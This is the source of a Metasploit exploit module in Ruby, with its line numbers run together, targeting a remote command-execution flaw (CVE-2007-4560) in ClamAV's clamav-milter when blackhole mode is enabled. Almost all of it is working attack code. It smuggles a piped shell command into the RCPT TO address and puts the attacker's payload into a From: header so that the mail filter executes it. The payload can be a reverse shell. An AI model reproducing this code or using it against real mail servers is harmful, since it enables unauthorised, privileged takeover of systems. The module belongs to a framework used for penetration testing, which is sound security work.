Path: blob/master/modules/exploits/unix/smtp/clamav_milter_blackhole.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::Smtp910def initialize(info = {})11super(12update_info(13info,14'Name' => 'ClamAV Milter Blackhole-Mode Remote Code Execution',15'Description' => %q{16This module exploits a flaw in the Clam AntiVirus suite 'clamav-milter'17(Sendmail mail filter). Versions prior to v0.92.2 are vulnerable.18When implemented with black hole mode enabled, it is possible to execute19commands remotely due to an insecure popen call.20},21'Author' => [ 'aushack' ],22'License' => MSF_LICENSE,23'References' => [24[ 'CVE', '2007-4560' ],25[ 'OSVDB', '36909' ],26[ 'BID', '25439' ],27[ 'EDB', '4761' ]28],29'Privileged' => true,30'Payload' => {31'DisableNops' => true,32'Space' => 1024,33'Compat' =>34{35'PayloadType' => 'cmd cmd_bash',36'RequiredCmd' => 'generic perl ruby bash-tcp telnet',37}38},39'Platform' => 'unix',40'Arch' => ARCH_CMD,41'Targets' => [42[ 'Automatic', {}],43],44'DisclosureDate' => '2007-08-24',45'DefaultTarget' => 0,46'Notes' => {47'Reliability' => UNKNOWN_RELIABILITY,48'Stability' => UNKNOWN_STABILITY,49'SideEffects' => UNKNOWN_SIDE_EFFECTS50}51)52)5354register_options(55[56OptString.new('MAILTO', [ true, 'TO address of the e-mail', 'nobody@localhost']),57]58)59end6061def exploit62# ClamAV writes randomized msg.###### temporary files in a randomized63# /tmp/clamav-#######################/ directory. This directory is64# the clamav-milter process working directory.65#66# We *can* execute arbitrary code directly from 'sploit', however the67# SMTP RFC rejects all payloads with the exception of generic CMD68# payloads due to the IO redirects. I discovered that the 'From:'69# header is written to this temporary file prior to the vulnerable70# call, so we call the file itself and payload.encoded is executed.7172sploit = "sh msg*" # Execute the clamav-milter temporary file.7374# Create the malicious RCPT TO before connecting,75# to make good use of the Msf::Exploit::Smtp support.7677oldaddr = datastore['MAILTO']78newaddr = oldaddr.split('@')7980datastore['MAILTO'] = "<#{newaddr[0]}+\"|#{sploit}\"@#{newaddr[1]}>"8182connect_login8384sock.put("From: ;#{payload.encoded}\r\n") # We are able to stick our payload in this header85sock.put(".\r\n")8687# Clean up RCPT TO afterwards8889datastore['MAILTO'] = oldaddr9091handler92disconnect93end94end959697